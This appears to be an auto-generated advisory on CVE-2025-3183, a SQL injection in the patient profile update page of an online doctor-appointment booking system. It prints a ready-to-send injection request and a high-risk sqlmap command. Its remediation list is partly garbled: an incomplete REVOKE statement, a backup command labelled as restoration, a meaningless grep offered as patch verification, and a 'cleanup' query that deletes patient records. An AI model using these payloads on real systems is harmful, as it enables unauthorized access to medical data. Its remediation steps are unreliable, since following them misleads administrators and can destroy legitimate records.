How CVE-2025-3183 Works
The vulnerability exists in `/patient/patientupdateprofile.php` of Projectworlds Online Doctor Appointment Booking System 1.0 due to improper input sanitization of the `patientFirstName` parameter. An attacker can inject malicious SQL queries via this parameter, manipulating database operations. Since the application fails to use prepared statements or proper escaping, the injected SQL executes in the backend database, potentially allowing unauthorized data access, modification, or deletion. The flaw is remotely exploitable without authentication, making it critical.
DailyCVE Form
Platform: Projectworlds Online Booking
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/15/2025
What Undercode Say:
Exploitation
1. Manual Exploit:
POST /patient/patientupdateprofile.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded patientFirstName=' OR 1=1-- -
2. SQLMap Automation:
sqlmap -u "http://target.com/patient/patientupdateprofile.php" --data="patientFirstName=test" --risk=3 --level=5 --dbms=mysql
Protection
1. Input Sanitization:
$patientFirstName = mysqli_real_escape_string($conn, $_POST['patientFirstName']);
2. Prepared Statements:
$stmt = $conn->prepare("UPDATE patients SET firstName=? WHERE id=?");
$stmt->bind_param("si", $_POST['patientFirstName'], $patientId);
$stmt->execute();
3. WAF Rules:
location ~ .php$ {
modsecurity_rules 'SecRule ARGS "@detectSQLi" "deny,status:403"';
}
4. Patch Verification:
grep -r "patientupdateprofile.php" /var/www/html/
5. Log Monitoring:
tail -f /var/log/apache2/access.log | grep -i "patientupdateprofile.php"
6. Database Permissions:
REVOKE ALL PRIVILEGES ON booking_db. FROM 'app_user'@'localhost'; GRANT SELECT, UPDATE ON booking_db.patients TO 'app_user'@'localhost';
7. Exploit Detection:
cat /var/log/apache2/error.log | grep -i "sql syntax"
8. Backup Restoration:
mysqldump -u root -p booking_db > backup.sql
9. Vendor Patch:
wget https://projectworlds.com/patches/1.0.1.zip unzip 1.0.1.zip -d /var/www/html/
10. Post-Exploit Cleanup:
DELETE FROM patients WHERE firstName LIKE '%--%';
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
